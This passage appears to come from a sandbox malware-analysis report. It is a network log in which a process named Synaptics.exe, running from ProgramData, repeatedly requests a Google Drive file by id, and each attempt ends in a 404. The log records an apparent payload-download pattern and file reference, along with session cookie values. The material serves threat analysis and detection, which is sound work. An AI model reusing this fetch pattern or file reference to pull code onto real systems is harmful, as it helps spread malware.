                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-wMNjJcf-m0qZ0W7xeAzIiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:25:37 UTC | 140 | IN
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:37 UTC | 1390 | IN
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="_i5OPGft3nlL8FSf-kCrhw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:37 UTC | 122 | IN
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.11 | 49878 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:38 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:25:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:39 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zLY_JPmrpZZDtPjU24Qn7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      29 | 192.168.2.11 | 49879 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:38 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:39 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-TnZJbMUdNflBo5sy8yMz3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      30 | 192.168.2.11 | 49892 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:39 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-woVSEX7XFTEIcVEvDXMNZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      31 | 192.168.2.11 | 49893 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:39 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:40 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6zQYTN8bv2zJTprVi6ZRzNdSwpBHX1NGA7GxtypyeKnfxWC32nG54grfxMVlAdad45
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-IfCEVruc-be_nQ8kd-CYNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:40 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:40 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="RrNTMnmoyFeseWrajDg5qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:40 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      32 | 192.168.2.11 | 49890 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:39 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Qvtp0Et9LBamYAD9Mz2_SQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      33 | 192.168.2.11 | 49891 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:39 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:40 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5P3TtdNgmCESfsYsUZ3Usn0AU7rnQMPtkb-CTuZklLm3ZrbYWnoxOUxZf9BDXHAMPI
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-tpK_-y7RXQiaLrPEOxiMrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:25:40 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:40 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="FSZrcKJwpG2dArzyk2BFZA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:40 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.11 | 49902 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:40 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
2024-12-30 10:25:41 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6arkfPGnYGasf2ukpJYMfO6ATQi4y9foiIMnpXv9pIK3h4OZgDzsUyCwSgS4TomXVP
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:41 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-82y_PJ99CVzlFqx5Y97ijQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:25:41 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:41 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="iAJihzPtLZs7Z8Kt84NDQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:41 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.11 | 49900 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:40 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:25:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:41 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-u5JQWhr5NY4txj0-c3YlfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.11 | 49901 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:40 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL
2024-12-30 10:25:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:41 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-RezMztyOWMBScXD2wLZD9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.11 | 49904 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:41 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
2024-12-30 10:25:41 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5jux0iU5fNHlHmzifbPL-V3MsFSwXvcCatqIIP1v1f9Ut_eFAs14giCVRqWGmXh_2R
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:41 GMT
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-5GwATmorsfyUrXLyXgICJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
